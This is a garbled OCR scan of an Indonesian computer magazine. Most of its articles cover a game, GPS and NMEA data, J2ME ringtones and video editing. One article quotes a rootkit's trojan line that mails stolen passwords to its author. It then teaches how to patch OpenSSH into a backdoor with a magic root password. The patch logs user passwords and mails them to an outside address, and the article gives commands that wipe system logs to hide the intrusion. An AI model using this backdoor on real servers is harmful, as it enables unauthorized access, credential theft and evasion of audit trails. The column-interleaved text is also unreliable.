Professional Documents
Culture Documents
ersamaan dengan diluncurkannya film Baik War of The Ring maupun The Hobbit da-
B ketiga dari trilogi Lord of The Ring: The pat anda peroleh playable demo-nya dalam CD
Return of The King, diluncurkan pula real-time NeoTek kali ini.
strategy game War of The Ring. Kebutuhan hardware untuk memainkan game
Mengikuti cerita modern classic dari R.J.J. Tolkien ini agak tinggi, yaitu paling tidak Pentium III 800
mengenai pertarungan antara kebaikan melawan MHz dan yang terutama VGA card dengan akse-
kegelapan yang dikendalikan oleh The One Ring. lerasi 3D de-
Kuasa kegelapan berusaha menguasai selamanya ngan RAM 32
Middle Earth, yang dihuni oleh manusia, elves, Mbyte.
dwarves, serta hobbit. Menggunakan
Hobbit, manusia pendek dengan kaki berbulu VGA card de-
dan paling lemah dibandingkan semua makhluk ngan RAM 16
yang lain, justru merupakan tokoh sentral da- Mbyte me-
lam trilogi Lord of The Ring. mang masih
Trilogi War of The Ring mencakup: mungkin, te-
tapi rendering
• Fellowships of The Ring grafiknya agak
• The Two Towers lama dan meng-
• The Return of The King ganggu kenya-
Pendahuluan dari trilogi ini adalah karya Tolkien manan ber-
yang lain, The Hobbit, yang juga dibuatkan main.
game-nya.
HomePage
amkm Salam!
anda Memahami GPS:
meminta Melacak Sampai ke Ujung Dunia
kami
mendownload
tidak dilanjutkan lagi
Keterbatasan tempat
pada CD NeoTek
membuat program
ini tidak efektif dan
terlalu banyak yang ter-
tunda untuk dapat dimuat • Kini dengan PDA Pocket PC yang dilengkapi CF GPS receiver serta peta
navigasi yang GPS-enabled, anda mendapatkan co-pilot yang menunjukkan jalan
dalam CD NeoTek dalam berkendara di berbagai kota di seluruh dunia, termasuk di Pulau Jawa.
16 Membuat Ringing
Tone dengan Java
Kini saatnya mempraktekkan com-
bining (di antaranya dengan membuat
storyboard) dan editing menggunakan
NeoProfil
Setelah menguasai ToneControl kita fungsi-fungsi yang terdapat pada Editorial Office
buat proyek kecil membuat ringing Pinnacle Studio 8 3 4 Cairnhill Rise
tone dengan Java. #05-01 The Cairnhill
Singapore 229740
Telp. +65-67386482
28 VNC Sebagai Spion
NeoTekno Boss di Kantor
Adanya akses Internet di kantor sering
Business Office
Gedung Cahaya Palmerah 503
disalahgunakan oleh karyawan. Hal Jl. Palmerah Utara III No. 9
22 Bahaya Backdoor
Rootkit
yang memusingkan para boss. De-
ngan sepengetahuan karyawan (kalau
Jakarta 11480
Telp. 021-5481457
Jangan sembarangan menggunakan tidak, salah-salah malah boss yang Fax. 021-5329041
backdoor rootkit yang banyak berte- kena tuntut soal privacy), kini para
baran di Internet. Salah-salah anda boss boleh saja mengawasi apa yang Pemimpin Umum
sendiri yang kena hack. Paling baik dikerjakan di depan komputer. Bukan Fachri Said
buat backdoor sendiri menggunakan dengan keylogger, melainkan thin Pemimpin Redaksi
openSSH yang paling mutakhir! client software seperti VNC ini.
Kosasih Iskandarsjah
Redaktur Ahli
Klak Klik LAPORAN DARI SITEX 2003, SINGAPORE EXPO 27-30 NOVEMBER
M E MAHAM I G PS R E C E IVE R
Melacak Sampai Ke Ujung Dunia
GPS (Global Positioning System) merupakan suatu teknologi yang kompleks yang
dikembangkan oleh Departemen Pertahanan Amerika Serikat untuk keperluan navigasi militer.
Namun kini tersedia juga untuk kepentingan swasta bahkan pribadi di seluruh dunia.
akan tergantung pada posisi anda di atas muka bumi. Masa- NMEA Sentence type yang paling lazim digunakan adalah:
lah yang serupa juga terjadi apabila sinyal radio menumbuk $GPGGA Global Positioning System Fix Data
obyek yang besar seperti gedung pencakar langit. Di atas $GPGLL Geographic Position - Latitude/Longitude
semua itu, satelitnya sendiri kadang-kadang mengirimkan $GPGSA GNSS DOP and Active Satellites
data almanak yang keliru. $GPGSV GNSS Satellites in View
Differential GPS (DGPS) mengatasi kesalahan-kesalahan $GPRMC Recommended Minimum Specific GNSS Data
ini dengan cara membandingkan ketepatan GPS dengan $GPVTG Course Over Ground and Ground Speed
suatu stasiun penerima di bumi yang sudah diketahui po- Contoh suatu $GPGGA Sentence (Fix data) tanpa data
sisinya. Karena hardware DGPS pada stasiun bumi sudah acquisition:
mengetahui posisinya sendiri, maka dengan mudah dapat
menghitung ketidaktepatan penerimanya. Stasiun ini ke- $GPGGA,235947.000,0000.0000,N,00000.0000,E,0,00,0.0,0.0,M,,,,0000*00
mudian mem-broadcast sinyal radio ke semua receiver dan contoh sentence sewaktu data acquisition:
yang dilengkapi dengan DGPS, memberikan sinyal yang
$GPGGA,092204.999,4250.5589,S,14718.5084,E,1,04,24.4,19.7,M,,,,0000*1F
berisi koreksi informasi untuk daerah tersebut.
yang terdiri dari:
NMEA Sentences Sentence ID $GPGGA
NMEA adalah singkatan dari National Marine Electronics UTC Time 092204.999 hhmmss.ss
Latitude 4250.5589 ddmm.mmmm
Association, suatu badan yang menerbitkan spesifikasi yang N/S Indicator S N = north, S = south
mendeskripsikan berbagai perlengkapan navigasi agar dapat Longitude 14718.5084 dddmm.mmmm
berkomiunikasi satu sama lain melalui koneksi serial RS-232 E/W Indicator E E = east, W = west
atau emulasinya (misalnya USB port). Ada beberapa ge- Position Fix 1 0 = invalid, 1 = valid
nerasi spesifikasi NMEA. Yang kita pakai sekarang adalah Satellites Used 04 0 - 12
NMEA 0183 versi 2.0 HDOP 24.4 Horz. dilution of precision
Altitude 19.7 Alt. in meter
GPS receiver menggunakan berbagai jenis protokol komuni- Altitude Units M M = meters
kasi. Beberapa protokol bersifat propretiary dan untuk keper- Geoid Separation Geoid sep. in meters
luan khusus, sedangkan yang bersifat publik dan didukung Separation Units M = meters
oleh banyak GPS receiver adalah protokol NMEA 0813. DGPS Age Age of DGPS data (seconds)
Suatu GPS receiver yang NMEA-compliant mem-broadcast DGPS Station ID 0000
Checksum *IF
informasi yang disebut NMEA Sentences melalui port serial Terminator CR/L
dengan laju transmisi 4800 baud.
WAAS/EGNOS
Tampilan NMEA Sentences
Sistem DGPS dikembangkan oleh banyak lembaga untuk
Setiap NMEA Sentence dimulai dengan $ yang diikuti oleh meningkatkan ketepatan GPS.
lima karakter yang mendefinisikan piranti sumbernya serta
jenis sentence itu sendiri. Sentence yang berbeda ditujukan WAAS (Wide Area Augmentation System) di Amerika
untuk pemakaian yang berbeda pula dan berisi field infor- menggunakan beberapa stasiun bumi untuk menghasilkan
masi yang berbeda pula. Setiap field dibatasi dengan koma. data terkoreksi dari 15 meter pada GPS menjadi sampai
Untuk mendapatkan informasi latitude dan longitude digu- ketepatan kurang dari tiga meter. WAAS untuk Eropa
nakan sentence $GPGGA, $GPGLL, dan $GPRMC. dikenal sebagai EGNOS.
Aplikasi GPS
Segala hal yang berhubungan dengan tempat dan waktu
dapat ditentukan dengan GPS. Selain menetapkan posisi kita
di atas bumi, GPS juga memungkinkan kita mensinkronisasi
waktu sampai ketepatan nanodetik.
Walaupun anda belum mempunyai GPS receiver sendiri,
bukan halangan bagi anda untuk mempelajarinya, membuat
percobaan, maupun mendapat manfaat darinya.
CD NeoTek kali ini menyediakan software GPS Viewer
yang berguna untuk memproses sinyal yang diperoleh dari
satelit dan menetapkan posisi anda di bumi, selain juga
kecepatan dan arah gerakan anda apabila anda membawa
GPS receiver berjalan atau berkendara. GPS Viewer yang
disediakan berjalan pada PC maupun Pocket PC (instalasi di
PC dan bila ada Pocket PC yang terhubung pada craddle,
maka software ini akan secara otomatis terinstalasi pula pada
Pocket PC). Berjalan baik pada Pocket PC yang menggunakan
prosesor lama SH3 dan MIPS maupun ARM yang terbaru.
Sistem WAAS di Amerika menggunakan beberapa stasiun bumi
untuk menghasilkan informasi terkoreksi terhadap data GPS Apabila GPS Viewer tidak dapat menghasilkan apa-apa tanpa
untuk kawasan Amerika Utara. Sistem yang serupa di Eropa GPS receiver, maka NMEA Time adalah softare yang dapat
dikenal sebagai EGNOS. digunakan untuk mensinkronisasi jam komputer anda
sampai ketepatan nano-detik melalui GPS yang langsung
terpasang pada komputer anda atau (bila tidak mempunyai
Cold Start, Warm Start, Hot Start GPS receiver) melalui atomic clock server yang dapat
diakses melalui Internet.
Pada saat GPS receiver belum pernah digunakan, akan di-
perlukan waktu cukup lama (beberapa jam ‘dijemur’ de- VisualGPS 3.3 dapat digunakan untuk menampilkan NMEA
ngan antena menghadap ke langit). Ini dikarenakan pada sentences secara grafik. Software ini selain dapat dijalankan
memori GPS receiver belum ada data apa-apa. Hal ini bersama GPS receiver terhubung pada port serial, dapat juga
sama dengan Cold Start yang akan menghapus semua dijalankan menggunakan log file emiulasi yang disediakan.
memori baik itu position, almanac, ephemerides (data orbit Cara terbaik untuk meng-capture data GPS secara virtual
satelit), waktu, dan clock drift. apabila anda belum mempunyai GPS receiver sendiri.
JALAN-JALAN DI AMERIKA
11 Misalkan kita merencanakan per-
jalanan dari Red Bank, NJ ke bekas
WTC, NY. Klik Red Bank, NJ pilih
Route > Add as Start dan WTC NY
Route > Add as End. Route dibuat
dengan Route > Route Planner > Get
Direction. Untuk mengaktifkan GPS
pilih dari menu Tools > GPS > Track
Position.
Tampilan
Leadtek WinFast GPS Navigator
Navigator GPS navigator adalah peta elektronik
pada PC yang mendukung pemakaian GPS
viewer, jadi pada peta itu terdapat
longitude dan latitude, yang akan
mengenali data serupa yang diperoleh
dengan menjalankan GPS receiver.
KingMAP atau HandyMap mengguna-
kan GPS Viewer sedangkan TomTom
Navigator menggunakan TomTom GPS.
Tampilan GPS Viewer pada PC (atas)
dan pada Pocket PC (bawah) MapPoint dari Microsoft sangat detail
dan merupakan alat untuk membuat
peta sendiri. Namun karena besarnya
Instalasi pada PC dan apabila Pocket hanya berjalan pada PC dan peta yang
PC terhubung lewat craddle pada PC dibuat pada MapPoint dapat di-ekspor
anda (dan ActiveSync sudah diaktif- untuk dibaca pada Pocket Street yang
kan), maka secara otomatis akan ter- berjalan pada Pocket PC.
instalasi juga pada Pocket PC. Tampilan WinFast Navigator CE
KingMap Singapore
KingMap Singapore berupa trial ver-
sion 5 hari dan berjalan pada Pocket PC.
Seperti biasa, Pocket PC anda sudah PC
terhubung lewat craddle ke PC dan su-
dah dikenali lewat Active Sync.
Instal software ini dengan double click
pada KingMap_SGP.exe dan software
ini akan terinstalasi secara otomatis pada
Pocket PC anda bersama petanya.
Apabila ada masalah dengan petanya,
anda dapat juga menjalankan Map
Manager untuk meng-instal peta yang
ada pada CD (S Singapore1124.km2) ke
Pocket PC anda.
J2M E WI R E LE SS TOO LK IT
Musik dengan MMAPI (1)
Setelah beberapa edisi NeoTek kita mengenal beberapa tool mobile media dan wireless toolkit, kini
Fitrianto Halim (fitriantoh@hotmail.com) mengajak anda masuk ke sisi pemrogramannya.
Sebuah tone sequence dispesifikasikan sebagai suatu daf- resolution_unit 1<= resolution_unit <= 127 1/1 note to 1/127 note 1/64 note
tar pasangan tone-duration dan user-defined sequence blocks.
block_number 0<= block_number <= 127 - -
Daftar tersebut dipaketkan dalam array dengan tipe byte.
Note 0<= note <= 127 or SILENCE C-1 to G9 or rest -
Method setSequence digunakan untuk memasukkan
sequence tersebut ke ToneControl. Duration 1<= duration <= 127 - -
Sintaks tone sequence dapat dijelaskan dalam notasi Volume 0<= volume <= 100 0% to 100% volume 100%
Augmented BNF (Boks 1.) sedangkan Tabel 1 menunjuk-
kan range yang valid untuk suatu parameter. multiplier 2<= multiplier <= 127 - -
Boks 1.
sequence = version *1tempo_definition *1resolution_definition block_number = byte-value
*block_definition 1*sequence_event ; block_number must be previously defined
; by a full block_definition
version = VERSION version_number
VERSION = byte-value volume_event = SET_VOLUME volume
version_number = 1 ; version # 1 SET_VOLUME = byte-value
volume = byte-value ; new volume
tempo_definition = TEMPO tempo_modifier
TEMPO = byte-value repeat_event = REPEAT multiplier tone_event
tempo_modifier = byte-value REPEAT = byte-value
; multiply by 4 to get the tempo (in bpm) used multiplier = byte-value
; in the sequence. ; number of times to repeat a tone
Tabel 2.
Penutup
Pada bagian kedua, kita akan belajar yang lebih seru lagi,
yaitu belajar cara menciptakan format Nokia ringing tone
(OTT) dan memainkannya menggunakan MMAPI.
Selamat mencoba...
Gambar 1.
J2M E WI R E LE SS TOO LK IT
Musik dengan MMAPI (2)
Fitrianto Halim (fitriantoh@hotmail.com) melanjutkan bahasan pemrograman dengan J2mE Wireless
Toolkit. Kali ini membuat ringing tone dengan Java.
ETELAH PADA BAGIAN PERTAMA KITA TELAH BELAJAR Untuk menggunakannya, pe-
S menggunakan ToneControl yang merupakan salah
satu bagian dari Mobile Media API (MMAPI), kini
nulis telah membuat sebuah
aplikasi MIDP sederhana ber-
kita akan belajar bagaimana membuat dan/atau mengkon- nama TestOTT dan jangan
versi ke format Nokia ringing tone (OTT) dan memain- lupa untuk menyimpan file
kannya menggunakan MMAPI. TestOTT.ott di folder res
Penjelasan tentang format Nokia ringing tone bisa dibaca (singkatan dari resource).
di: Smart Messaging Specification, Revision 3.0.0 (di- Jika kita perhatikan, cukup
download di: mudah sebenarnya cara mem-
http://www.forum.nokia.com/ndsCookieBuilder?fileParamID=1029) buat file berformat Nokia
ringing tone (OTT) ini.
terutama pada bagian 3.6 RINGING TONES dan contoh-
nya bisa dilihat pada bagian 5.1.5 An example of Ringing Tetapi berhubung penulis
tone format. ingin yang praktis, maka pe-
nulis berusaha mencari cara
Berikut adalah hex dump dari format pesan Ringing tone: lainnya.
02 4A 3A 51 : D1 95 CD D0 : 04 00 1B 20 : 55 05 90 61 Ternyata, Nokia Developer's
05 60 55 85 : 50 54 85 40 : 82 08 49 90 : 00 00 Suite for the J2ME terutama
Data tersebut merupakan hasil encode dari sekumpulan di bagian Audio Converter da-
bit yang dijelaskan pada Tabel 1. pat dimanfaatkan untuk men-
ciptakan file berformat
Ingat, data-data tersebut merupakan nilai heksadesimal Nokia ringing tone (OTT).
(hex dump) dari suatu file biner. Anda bisa menggunakan
Java untuk meng-create file biner, tetapi berhubung pe- Seperti kita ketahui, Audio
nulis agak malas :) , maka penulis membuat script seder- Converter dapat mengkon-
hana yang dapat dijalankan dengan DEBUG (file test.scr) versi file berformat MIDI
dimana “source-code”-nya adalah sebagai berikut: (*.mid, *.smf, *.midi) dan/
atau Ringing Tone XML (*.xml) ke format Over the Air
e100 02 4A 3A 51 D1 95 CD D0 04 00 1B 20 55 05 90 61 audio (*.txt), Bytes source (*.java) dan/atau Ringing Tone
e110 05 60 55 85 50 54 85 40 82 08 49 90 00 00 XML (*.xml).
n test.ott
rcx
1e
w
q
Tabel 1.
00000010 <command-length> Number of command part presents
01001010 <ringing-tone-programming> Command part 1 (with filler bit)
0011101 <sound> Command part 2
001 <basic song type>
0100 <song title length> 4 characters (ISO-8859-1)
01110100 the first character 't'
01100101 the second character 'e'
01110011 the third character 's'
01110100 the fourth character 't'
00000001 <song sequence length> 1 song patterns
000 <pattern header> pattern header id
00 <pattern id> A-part
0000 <loop value> no loop
00001101 <pattern specifier> <length of the new pattern> 13 pattern
instructions
100 <tempo instruction id>
10000 <beats per minute> 160 (i.e. length of 1/4 note = 0,38 sec.)
001 <note instruction id>
0101 <note value> note E
010 <note duration> ¼ note
00 <note duration specifier> no special duration
001 <note instruction id>
0110 <note value> note F
010 <note duration> ¼ note
00 <note duration specifier> no special duration
001 <note instruction id>
1000 <note instruction> note G
010 <note duration> ¼ note
00 <note duration specifier> no special duration
001 <note instruction id>
0101 <note value> note E
100 <note duration> 1/16 note
00 <note duration specifier> no special duration Untuk memudahkan pembuatan file berformat Nokia
001 <note instruction id> ringing tone (OTT) ini, pilih dalam ekstensi *.java .
0101 <note value> note E
Sebagai contoh, penulis mengkonversi sebuah file MIDI
011 <note duration> 1/8 note
yang disertakan pada aplikasi Mobile Music Polyphonic
00 <note duration specifier> no special duration
(disertakan pada CD NeoTek Vol. III - No. 09, Jun/Jul
001 <note instruction id>
2003) dan kemudian disimpan ke file MalamKudus.java.
0101 <note value> note E
010 <note duration> ¼ note Karena file tersebut tidak lengkap, maka isi file tersebut
00 <note duration specifier> no special duration dipakai untuk membuat file createOTT.java dengan
001 <note instruction id> “source-code”-nya adalah sebagai berikut:
0101 <note value> note E import java.io.*;
001 <note duration> ½ note public class createOTT {
00 <note duration specifier> no special duration public static void main(String args[]) {
001 <note instruction id> byte[] data = {
0101 <note value> note E (byte)0x02, (byte)0x4a, (byte)0x3a, (byte)0x40,
000 <note duration> full note (byte)0x04, (byte)0x01, (byte)0x57, (byte)0x16,
00 <note duration specifier> no special duration (byte)0x6d, (byte)0x05, (byte)0x90, (byte)0x4d,
010 <scale instruction id> (byte)0x05, (byte)0x92, (byte)0x51, (byte)0x84,
(byte)0x50, (byte)0x83, (byte)0x61, (byte)0x49,
00 <note scale> Scale-1 (i.e. Note A is 440 Hz)
(byte)0x64, (byte)0x98, (byte)0x61, (byte)0x64,
001 <note instruction id>
(byte)0x13, (byte)0x29, (byte)0x64, (byte)0x98,
0000 <note value> Pause
(byte)0x61, (byte)0x64, (byte)0x13, (byte)0x2a,
010 <note duration> ¼ note (byte)0x88, (byte)0x90, (byte)0x8a, (byte)0x12,
00 <note duration specifier> no special duration (byte)0x68, (byte)0xa6, (byte)0xc8, (byte)0x6d,
010 <scale instruction id> (byte)0x05, (byte)0x8a, (byte)0x60, (byte)0x86,
01 <note scale> Scale-2 (i.e.Note A is 880 Hz),default (byte)0x10, (byte)0x6d, (byte)0x26, (byte)0x98,
001 <note instruction id> (byte)0x61, (byte)0x05, (byte)0x92, (byte)0x61,
1001 <note value> Gis i.e. As' (byte)0x85, (byte)0x90, (byte)0x4c, (byte)0xa6,
000 <note duration> full note (byte)0x08, (byte)0x61, (byte)0x06, (byte)0xd2,
00 <note duration specifier> no special duration (byte)0x69, (byte)0x86, (byte)0x10, (byte)0x59,
0000000 filler bits (byte)0x26, (byte)0x18, (byte)0x59, (byte)0x04,
00000000 <command end> The end of the ringing tone data (byte)0xca, (byte)0xa2, (byte)0x24, (byte)0x22,
(byte)0x82, (byte)0x89, (byte)0x22, (byte)0xc4,
(byte)0x9a, (byte)0x41, (byte)0xb2, (byte)0xa8,
BA S I C V I D E O E D I T I N G
Combining & Editing (2)
Andi Ismayadi (Fuzk3_kendi@yahoo.com) meneruskan bahasan mengenai
combining (diantaranya dengan menyusun dulu storyboard) dan editing menggunakan
berbagai fasilitas yang tersedia pada Pinnacle studio 8
ETELAH BERKENALAN DENGAN PINNACLE STUDIO 8, DAN Dalam menyusun adegan-adegan Video editing pada dasar-
S apa saja yang terdapat dan apa yang dapat dilaku-
kannya, sekarang kita bisa memulai proses yang
tadi intro sebaiknya diawali
dengan judul tema video itu,
nya adalah proses-proses
sebagai berikut:
terlama dan membutuhkan kesabaran dan juga kreativitas lalu disusun dalam rangkaian • Encoding
editornya. rekaman awal. Misal anda me- • Cutting
Pada proses ini kita akan berlajar menempatkan adegan- rekam satu peristiwa ulang • Combining
adegan (scenes) yang telah kita potong secara rapi agar ti- tahun, nah awal dari adegan itu • Editing
dak ada yang patah sewaktu pergantian adegan; mengatur tentunya datangnya para tamu, • Encoding (lagi)
lalu tiba orang yang berulang • Burning
cahaya dan kualitas gambar; serta memasukan suara baik
itu musik latar maupun Sound FX. Juga menempatkan tahun, dan diteruskan dengan
judul dan tulisan dalam video itu. peniupan lilin yang diikuti dengan penyanyian lagu ulang
tahun. Selanjutnya pesta berlangsung dan berakhir dengan
Dalam bagian ini hanya dibahas hal-hal dasar umum, un- pulangnya para tamu dan ditutup dengan kalimat penutup.
tuk hasil kualitas itu tergantung dari editornya yaitu anda
sendiri, bagaimana anda mengatur semua adegan tadi men- Alur pembuatan video juga sangat mendukung pembuatan
jadi satu kesatuan video yang bagus dalam storyboard yang video clip yang sempurna. Untuk itu sebelumnya anda su-
ada dalam Pinnacle Studio 8. dah harus menentukan tema apa yang akan anda pakai
dalam proses recording dan proses pengeditan ini.
BUKA FILE UNTUK DIEDIT DIPECAH JADI BEBERAPA SCENE MENYUSUN STORYBOARD
1 Pertama-tama kita buka file yang
akan kita buka, file video/scene
2 Ketika dibuka file tadi langsung
dideteksi oleh Pinnacle untuk
3 Setelah itu terlihat video yang ter-
potong-potong dalam bebeapa
yang akan dibuka dan di edit memecahnya menjadi beberapa scene tadi. Anda tinggal men-
nantinya. scene lagi. drag n drop scene tadi ke dalam
story board. Ketika scene tadi
sudah di drop akan terlihat tan-
da centang di pojok kanan scene
tadi. Disini kreativitas anda dibu-
tuhkan dalam menyusun scene-
scene tadi dalam storyboard itu.
PERGANTIAN SCENE
4A Dalam pergantian adegan video
sangat dibutuhkan sebuah efek
yang menyatakan bahwa scene
A sudah berakhir dan akan ma-
suk ke scene B. Pastinya akan
Kurang bagus apabila anda tidak
memasukan efek Transisi di an-
tara scene tadi, karena akan ter-
lihat scene itu patah dalam pro-
ses pergantian alur.
ada edisi kali ini, penulis tidak membahas lebih dengan menghapus baris $md5sum=*@*.* atau mail
P lanjut tentang cara kerja remote exploit ataupun
local exploit. Namun penulis ingin mengulas lebih
$md5sum
Sampai disini kita sudah bisa mengamankan diri agar
jauh tentang backdoor, salah satu rootkit yang menjadi tidak terjebak oleh rootkit yang kita gunakan sendiri.
andalan para hacker untuk mencari lebih jauh informasi
tentang server. Baik mencatat hasil login yang keluar ma- Selanjutnya mungkin kawan-kawan bertanya apakah bisa
suk didalam server ataupun informasi yang lebih lanjut kita sendiri membikin backdoor dengan memanfaatkan
tentang aktivitas sysadmin. file yang sudah ada? Jawaban adalah bisa!
Backdoor menjadi menarik dibahas mengingat banyak se- Server dan Paket OpenSSH
kali newbies (hacking script kiddies) yang memakai root-
kit tersebut namun acapkali tak disadari bahwa di dalam Ada beberapa paket openSSH (h http://www.openssh.com)
backdoor yang dia gunakan terselip trojan lain, sehingga yang dapat kita manfaatkan untuk membuat backdoor.
apa semua informasi yang dia dapatkan juga disadap oleh Diantaranya adalah openSSH-3.4p1, openSSH-3.5p1, dan
orang lain (sang pembuat backdoor). openSSH-3.6.1p2. NeoTek III/4 pernah membahas cara
membuat backdoor menggunakan openSSH-3.5p1. Yang
Salah satu bentuk backdoor yang mungkin banyak digu- kita bahas disini adalah cara membuat backdoor meng-
nakan oleh hacker secara umum adalah backdoor type ssh gunakan paket openSSH-3.6.1p2 karena type ini tergo-
(shv4) yang bisa anda download di long baru.
http://beatbox.suidzer0.org/files/shv4.tar.gz Adapun yang perlu dipersiapkan adalah sebuah server un-
release 2002 oleh pinturichi. Toolkit tersebut hendaknya tuk ujicoba backdoor, sedangkan paket openSSH-3.6.1p2
sebelum digunakan terlebih dahulu dibuka source code- bisa anda download di http://www.openssh.com atau
nya. Mungkin sebagian kawan-kawan belum mengetahui http://www.openbsd.org
bahwa di dalam source code itu ada trojan yang mengirim
magic password ke email author dari backdoor tersebut.
Bagaimana kita mengetahuinya? Coba simak file setup
dibawah ini yang menjadi bagian dari backdoor shv4.tar.gz
./encrypt -e .shmd5 /dev/srd0
rm -rf .shmd5
Baris di atas berarti semua logger disimpan dalam direk-
tori /dev/srd0 yang kemudian dicatat dan dikirimkan ke
email author yang dapat kita simak dalam kutipan berikut:
#echo "$1:$2:`hostname -f`:$MYIPADDR:$dport" | mail $md5sum
endtime=`date +%S`
total=`expr $endtime - $startime` Download openSSH-3.6p2 dengan perintah wget:
# wget http://sunsite.ualberta.ca/pub/OpenBSD/OpenSSH/
Didalam source tersebut terlihat bahwa setelah membaca portable/openssh-3.6.1p2.tar.gz
setiap password yang masuk ataupun diganti, maka akan
dikirimkan email dengan perintah mail $md5sum
Perhatikan pula kutipan file setup berikut: File Injeksi
#md5sum=leshmadhi80@yahoo.com Siapkan file injeksi untuk patching paket openSSH yang
Nah, kalau kita sendiri tidak jeli dalam membaca source hendak kita jadikan backdoor. Lampiran file patch untuk
code dan kita tidak ambil pusing barisan perintah diatas, openSSH adalah sebagai di bawah ini atau dalam file
maka kita akan terjebak sendiri dengan rootkit yang kita Injeksi.txt dalam CD NeoTek edisi ini.
gunakan. Hacker kena hack sendiri... # THIS PATCH IS FOR STUDYING PURPOSES.
# KECOAK ELEKTRONIK PROPERTIES 2003.
Bagaimana mengatasinya? # TESTED WITH openBSD 3.2 also FreeBSD-4.8
diff -uNr openssh-3.6.1p2/auth-passwd.c openssh-backdoor/auth-passwd.c
Pertama bisa kita lakukan adalah mengedit command --- openssh-3.6.1p2/auth-passwd.c 2003-04-29 10:12:08.000000000 +0100
+++ openssh-backdoor/auth-passwd.c2003-07-06 19:01:44.000000000 +0100
md5sum=leshmadhi80@yahoo.com dengan mengubah ke
email kita sendiri, atau dapat kita gunakan langkah kedua dst...
Backdoor.h
Menjalankan Script
Setelah proses patching dilakukan maka akan terbentuk
file backdoor.h yang magic password yang digunakannya Setelah keempat file tersebut anda simpan sesuai dengan
bisa anda edit sendiri maupun PATH untuk logger server. nama masing masing atau bisa anda ubah sendiri. Maka
kita uji coba dengan menjalankan openSSH kedalam
Yang perlu diperhatikan dalam file backdoor.h adalah server kita sendiri dengan mengetikkan command:
magic password menggunakan kecoak-elektronik untuk
login menggunakan akses root dengan fake login. Yang # ./mulai
artinya kita disini masuk menggunakan akses root de-
ngan password palsu (tidak menggunakan password asli
root) dan juga tidak tercatat kedalam log yang ada di
dalam server.
Yang kedua PATH untuk menyimpan file logger yang ada Proses mulai disini mencakupi proses testing, dan confnya
di dalam server ada di direktori /tmp dengan nama file Setelah semua selesai kita lanjutkan untuk mencari nomor
pass_ssh.log. Magic password dan letak dari file PATH PID dari sshd yang telah terinstal dengan menjalankan
bisa anda ubah sesuai keinginan anda. script cari
/* backdoor stuff */ # ./cari
#define BACKDOORPASSWD "kecoak-elektronik"
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE "/tmp/pass_ssh.log"
int backdoor_active;
Nah nomor PID yang hendak kita restart telah muncul di
Anjuran bash prompt server.
Hendaknya letak PATH diletakkan di /dev/hdal, agar dapat Misalnya nomorvPID-nya adalah 2355 maka kita restart
kita memperbaharui file backdoor.h dengan command
/* backdoor stuff */ # kill -HUP 2355
#define BACKDOORPASSWD "kecoak-elektronik"
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE
"/dev/hda1/pass_ssh.log"
int backdoor_active;
Membersihkan Jejak
Selanjutnya yang perlu dilakukan adalah membersihkan
file-file yang ada dan jangan lupa untuk membersihkan
log anda secara manual ataupun dengan menggunakan
log remover.
Dengan cara manual dapat anda lakukan dengan menge-
tikkan baris command berikut berikut ini
# echo >/var/spool/mail/root
# echo >/var/run/utmp
# echo >/var/log/wtmp
# echo >/var/log/lastlog
# echo >/var/log/messages
# echo >/var/log/secure
# echo >/var/log/maillog
# echo >/var/log/xferlog AGI PARA ADMIN JARINGAN YANG SUDAH BIASA MENG-
# echo >/root/.bash_history B gunakan Novell, saya yakin anda pasti masih ingat
dengan remote console (RCONSOLE.EXE), yaitu
sebuah utilitas yang fungsinya untuk memudahkan kita
mengakses konsol server dari jarak jauh (Gambar 1 dan 2)
Setelah kita migrasi ke Windows, ternyata utilitas sejenis
itu masih tetap kita butuhkan, khususnya dalam rangka
maintenance maupun hacking dalam lingkup intern (lokal).
Program (utilitas) yang saya bahas dalam artikel saya kali
ini adalah COOL! Remote Control. Alasan saya memilih-
nya, karena selain kaitannya untuk hal di atas, program
ini juga ternyata memiliki sejumlah fitur yang tidak ada
pada program lain atau yang sejenis dengannya.
Tahap Akhir
Setelah semua bisa berjalan dengan sukses. Pertanyaan
selanjutnya bagaimana agar backdoor yang sudah berhasil
kita compile dapat secara otomatis mengirim log-log ke
email kita?
Yang perlu diperhatikan disini adalah sedikit menam-
bahkan baris pada file auth-passwd.c yang ada didalam
openSSH dengan disisipi baris berikut:
fprintf (outf, "%s:%s:%s:%d\n",pw-
>pw_name,password,get_remote_ipaddr(), get_local_port()
); system("tail -1 /dev/zer0/pass_ssh.log | mail scut@kecoak.or.id");
Baris command tersebut dapat anda ubah dengan editor
pico ataupun vi didalam server anda. Dan email dapat
anda ubah sesuai dengan email anda sendiri.
Sekian bahasan singkat dari kami, apabila ada pertanyaan Gambar 1. Tampilan program Remote Console milik Novell
silahkan kirimkan email ke scut@kecoak.or.id dan juga
bisa anda hubungi lewat IRC DAlnet dengan ID scut di
channel #kk-elektronik dan #indohack
MOTTO:
Hacking is about thinking for yourself.
Hacking needs a place for meeting, discussing, testing, proving,
questioning, designing, redesigning, engineering, reengineering,
searching, researching, hacking, phreaking, brainstorming and
understanding.
As our world is getting more and more complex,
gaining and sharing knowledge is key to survival.
There is a need for open communication and a free,
unlimited exchange of ideas and concepts.
Salam hangat,
Betha Aris S - Scut
<scut@kecoak.or.id - scut@k-elektronik.org>
Thanks to:
fwerd, samurai_hack, ceyen, rollan, cbug, r3dshadow, logC, gothgirl,
deGleng, cahcephoe, infidra, ftp_geo, dj-psyco, sco, madi, anjaz
Artikel ini diedit oleh MA Rody Candera (odyxb@melva.org) Gambar 2.Menjalankan modul INSTALL.NLM secara remote
Jika ikon tersebut anda klik kanan, maka ada dua hal yang
bisa anda lakukan terhadap program Remote Control Server.
Pertama untuk melihat alamat IP komputer tempat dia di
instal, dan yang kedua untuk mengisi atau mengganti
kata sandinya (lihat Gambar 10 dan 11).
B. Menginstal COOL! Remote Control di Komputer Lokal Gambar 13. Melihat daftar disk dan folder yang bisa diakses.
1. Tentukan komputer tempat di mana anda akan
meremote komputer yang menjadi server program
COOL! Remote Control. Setelah itu lakukan proses
instalasi dengan cara yang sama seperti yang sudah
dijelaskan di atas.
C. Mengoperasikan COOL! Remote Control
1. Dari komputer lokal, klik Start > Program >
COOL! Remote Control, pilih COOL! Remote
Control 1.12.
2. Klik Main > Connect To, lalu pilih salah satu
alamat IP komputer yang akan anda remote, klik OK.
Gambar 16. Menjalankan MS-DOS Prompt secara remote. Gambar 19. Mengkonfigurasi setting Network secara remote.
